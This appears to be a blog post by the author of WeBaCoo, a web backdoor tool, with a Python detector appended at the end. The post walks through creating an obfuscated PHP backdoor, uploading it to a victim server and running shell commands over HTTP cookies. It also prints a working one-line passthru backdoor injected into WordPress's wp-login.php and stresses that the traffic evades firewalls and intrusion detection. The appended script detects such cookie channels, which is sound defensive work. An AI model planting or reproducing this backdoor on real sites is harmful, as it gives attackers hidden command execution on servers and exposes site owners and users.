Let's look at two case studies to present WeBaCoo's functionality. I will use a local Burp proxy (127.0.0.1:8080) to inspect the HTTP cookie headers.

1. Simple case

The first scenario involves adding a new PHP file with the obfuscated backdoor code to the webroot. After that, the client can use the terminal mode to execute commands on the server.

First, let's create the backdoor file using the 'shell_exec' system function:

root@testbed:~# ./webacoo.pl -g -f 2 -o backdoor.php

WeBaCoo 0.1 - Web Backdoor Cookie Script-Kit
Written by Anestis Bechtsoudis { @anestisb | anestis@bechtsoudis.com }
http(s)://bechtsoudis.com

[+] Backdoor file "backdoor.php" created.

Then I upload backdoor.php to the victim server and start a “terminal” connection:

root@testbed:~# ./webacoo.pl -t -u http://172.16.146.128/backdoor.php

WeBaCoo 0.1 - Web Backdoor Cookie Script-Kit
Written by Anestis Bechtsoudis { @anestisb | anestis@bechtsoudis.com }
http(s)://bechtsoudis.com

Type 'exit' to quit terminal!

webacoo> whoami
www-data
webacoo> exit

^Bye^

The corresponding request and response recorded by Burp are shown in the following screenshots:

2. Complex case – backdooring wordpress login

Users familiar with WordPress know that before the login process the server sets a test cookie to check whether the browser has cookies enabled. Right after that test cookie is set I will inject the backdoor code unobfuscated. I create the PHP payload using the 'passthru' function and the -r (raw output) flag to get the un-obfuscated code.

root@testbed:~# ./webacoo.pl -g -f 4 -o raw-backdoor.php -r

WeBaCoo 0.1 - Web Backdoor Cookie Script-Kit
Written by Anestis Bechtsoudis { @anestisb | anestis@bechtsoudis.com }
http(s)://bechtsoudis.com

[+] Backdoor file "raw-backdoor.php" created.

Then the malicious code is injected right after the test cookie is set, so wp-login.php looks as follows (only the crucial lines are included):

//Set a cookie now to see if they are supported by the browser.
setcookie(TEST_COOKIE, 'WP Cookie check', 0, COOKIEPATH, COOKIE_DOMAIN);
if ( SITECOOKIEPATH != COOKIEPATH )
        setcookie(TEST_COOKIE, 'WP Cookie check', 0, SITECOOKIEPATH, COOKIE_DOMAIN);

//My payload
if(isset($_COOKIE['cm'])){ob_start();passthru(base64_decode($_COOKIE['cm']).' 2>&1');setcookie($_COOKIE['cn'],$_COOKIE['cp'].base64_encode(ob_get_contents()).$_COOKIE['cp'], 0, SITECOOKIEPATH, COOKIE_DOMAIN);ob_end_clean();}

// allow plugins to override the default actions, and to add extra actions if they want
do_action( 'login_init' );
do_action( 'login_form_' . $action );

After the injection I establish a “terminal” connection to the infected server to execute my commands:

root@testbed:~# ./webacoo.pl -t -u http://172.16.146.128/wordpress/wp-login.php -p 127.0.0.1:8080

WeBaCoo 0.1 - Web Backdoor Cookie Script-Kit
Written by Anestis Bechtsoudis { @anestisb | anestis@bechtsoudis.com }
http(s)://bechtsoudis.com

Type 'exit' to quit terminal!

webacoo> whoami
www-data
webacoo> exit

^Bye^

And the corresponding request and response recorded by Burp:

As you can see, the communication data is pretty stealthy and will not trigger regular application firewall and IDS/IPS setups. That said, I would appreciate your feedback from tests under your own setups, to evaluate and evolve WeBaCoo's functionality.
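For the defender's side of the cookie channel described above, here is an added example (my own Python, not WeBaCoo code) that inspects one request/response pair: it flags request cookies whose value is base64 of printable text, and Set-Cookie values of the shape delimiter + base64 + delimiter that the injected payload produces, using the short request cookies as delimiter candidates. The sample headers, cookie names and the printable-text heuristic are my assumptions, constructed to match the layout the post shows.

```python
"""Heuristics for spotting a command/response channel tunnelled in HTTP cookies.

Added example, not WeBaCoo code. It mirrors the layout the post describes: the
request carries base64 text in one cookie, the response carries
<delimiter><base64 output><delimiter> in a Set-Cookie header.
"""
import base64
import binascii
import re
import string
from typing import Dict, List, Optional, Tuple

_PRINTABLE = set(string.printable.encode())
_B64_ALPHABET = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

# Constructed sample exchange: d2hvYW1p is base64("whoami"); the Set-Cookie value
# is "XX" + base64("www-data\n") + "XX". The cookie names cm/cn/cp are the post's.
REQUEST_COOKIE = "cm=d2hvYW1p; cn=SESSID; cp=XX"
RESPONSE_SET_COOKIE = "SESSID=XXd3d3LWRhdGEKXX; path=/"


def parse_cookie_header(value: str) -> Dict[str, str]:
    """'a=1; b=2' -> {'a': '1', 'b': '2'}; parts without '=' are ignored."""
    cookies: Dict[str, str] = {}
    for part in value.split(";"):
        name, sep, val = part.strip().partition("=")
        if sep:
            cookies[name.strip()] = val.strip()
    return cookies


def decode_if_base64_text(value: str) -> Optional[bytes]:
    """Decoded bytes when value is well-formed base64 of printable text, else None.

    Random session tokens that happen to look like base64 almost never decode to
    all-printable bytes, which keeps this heuristic's false positives low.
    """
    if len(value) < 4 or len(value) % 4 or not _B64_ALPHABET.match(value):
        return None
    try:
        data = base64.b64decode(value, validate=True)
    except binascii.Error:
        return None
    return data if data and all(b in _PRINTABLE for b in data) else None


def find_wrapped_payload(value: str, candidates: Optional[List[str]] = None
                         ) -> Optional[Tuple[str, bytes]]:
    """Find <delim><base64 text><delim> inside a cookie value.

    Delimiters seen in the matching request are tried first; otherwise every
    short prefix that is also the suffix is tried.
    """
    delims = list(candidates or [])
    delims += [value[:n] for n in range(1, 9) if len(value) > 2 * n + 4]
    for d in delims:
        if d and value.startswith(d) and value.endswith(d):
            decoded = decode_if_base64_text(value[len(d):-len(d)])
            if decoded is not None:
                return d, decoded
    return None


def analyse_exchange(request_cookie: str, set_cookie: str) -> List[str]:
    """Findings for one request/response pair; an empty list means nothing suspicious."""
    findings: List[str] = []
    req = parse_cookie_header(request_cookie)
    for name, val in req.items():
        decoded = decode_if_base64_text(val)
        if decoded is not None:
            findings.append(f"request cookie {name!r} decodes to {decoded.decode()!r}")
    # Short request cookies are the likely delimiters of the response wrapper.
    short_values = [v for v in req.values() if 0 < len(v) <= 8]
    resp_name, _, resp_val = set_cookie.split(";")[0].strip().partition("=")
    wrapped = find_wrapped_payload(resp_val.strip(), short_values)
    if wrapped:
        delim, output = wrapped
        findings.append(f"response cookie {resp_name!r} wraps {output.decode()!r} "
                        f"between {delim!r}")
    return findings


if __name__ == "__main__":
    for line in analyse_exchange(REQUEST_COOKIE, RESPONSE_SET_COOKIE):
        print(line)
```

Run against the constructed pair, it reports the decoded command in the request cookie and the decoded command output wrapped between the delimiter in the response cookie.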

A. Bechtsoudis
